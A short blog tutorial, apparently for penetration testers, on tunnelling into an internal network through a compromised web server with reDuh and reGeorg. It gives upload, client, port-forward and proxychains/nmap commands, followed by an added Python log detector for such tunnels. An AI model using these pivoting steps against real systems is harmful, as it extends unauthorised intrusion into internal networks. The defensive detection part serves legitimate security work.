How to pivot to an internal network through a web server that allows file uploads

During a penetration test, once you have successfully compromised a web server and are able to upload files or a shell, reDuh lets you connect to the internal network behind the web server in a few simple steps.

With reDuh you can create a tunnel that forwards TCP over HTTP requests. The steps are:

1) Download reDuh: https://github.com/sensepost/reDuh

2) Upload the reDuh server part (PHP/ASP/JSP) to the web server, for example to the URL: http://web.example.com/uploads/reDuh.php

3) The attacker runs reDuhClient on his machine: java -jar reDuhClient.jar http://web.example.com/uploads/reDuh.php

4) The attacker administers the reDuh server via TCP port 1010 and can create a port forward:

4a) He connects to reDuh and creates a simple tunnel: [createTunnel]SOMEPORT:TARGETSERVER:SERVERPORT, for example to a known internal MySQL server: [createTunnel]33306:mysql.example.loc:3306

4b) Now the attacker can connect to the internal MySQL server at the address localhost:33306

TCP packets transmitted over this tunnel are now wrapped in HTTP requests.

reDuh supports multiple connections, so you can add more tunnels.

 

In 2014 the developers created reGeorg, a successor to reDuh.

reGeorg provides TCP tunneling over HTTP and bolts a SOCKS4/5 proxy on top of it, so reGeorg is now a fully functional SOCKS proxy and makes it possible to analyze the target's internal network.

reGeorg requires Python 2.7 and the urllib3 module.

Simple steps to use it:

1) Upload tunnel aspx/ashx/jsp/php to the web server

2) Configure reGeorg by running: python reGeorgSocksProxy.py -p 1337 -u http://web.example.com/uploads/tunnel.php

3) Update your /etc/proxychains.conf to use this port and then, for example, start nmap and scan ports.

You can download reGeorg from this link: https://github.com/sensepost/reGeorg
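
From the defender's side, both tools leave the same trace in the web server's access log: one client sending a steady stream of requests to a single script in an upload directory. The following is an added example (not part of the original post or of either tool) that flags this pattern in Combined Log Format lines; the /uploads/ prefix, the window and threshold values, and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined Log Format: ip - - [time] "METHOD path PROTO" status size
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"[A-Z]+ (?P<path>\S+) [^"]*" \d{3} ')
# Script types the page lists for the uploaded tunnel endpoint.
SCRIPT_RE = re.compile(r'\.(php|asp|aspx|ashx|jsp)$', re.I)
UPLOAD_DIRS = ("/uploads/",)    # assumption: where uploaded files are served from
WINDOW = timedelta(seconds=60)  # assumption: sliding-window length
THRESHOLD = 30                  # assumption: requests per window from one client

def find_tunnel_candidates(lines):
    """Return sorted (ip, path, peak) for upload-dir scripts polled >= THRESHOLD times per WINDOW."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not in the expected log format
        path = m["path"].split("?", 1)[0]  # ignore the query string
        if not (path.startswith(UPLOAD_DIRS) and SCRIPT_RE.search(path)):
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        hits[(m["ip"], path)].append(ts)
    findings = []
    for (ip, path), stamps in hits.items():
        stamps.sort()
        peak = start = 0
        for end in range(len(stamps)):  # sliding window over sorted timestamps
            while stamps[end] - stamps[start] > WINDOW:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= THRESHOLD:
            findings.append((ip, path, peak))
    return sorted(findings)

def sample_log():
    """Constructed sample: ordinary browsing plus one client polling one script."""
    fmt = '{ip} - - [01/Jan/2024:02:{m:02d}:{s:02d} +0000] "{v} {p} HTTP/1.1" 200 512'
    lines = [fmt.format(ip="198.51.100.7", m=0, s=s, v="GET", p="/index.php")
             for s in range(0, 60, 10)]
    lines.append(fmt.format(ip="198.51.100.7", m=1, s=5, v="POST", p="/uploads/avatar.php"))
    lines += [fmt.format(ip="203.0.113.9", m=2, s=s, v="POST", p="/uploads/tunnel.php?x=1")
              for s in range(45)]
    return lines

if __name__ == "__main__":
    for ip, path, peak in find_tunnel_candidates(sample_log()):
        print(f"{ip} -> {path}: {peak} requests within {WINDOW.seconds}s")
```

Any hit on an executable script inside an upload directory deserves a look on its own; the rate check only ranks which ones behave like a tunnel endpoint.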

 

Pivot and pwn.

P.S.: Bypassing restrictions on uploaded files isn't described here.

 

Comments   

0 #1 luckystrike 2016-05-20 02:34
nice! ThX a lot!! :lol: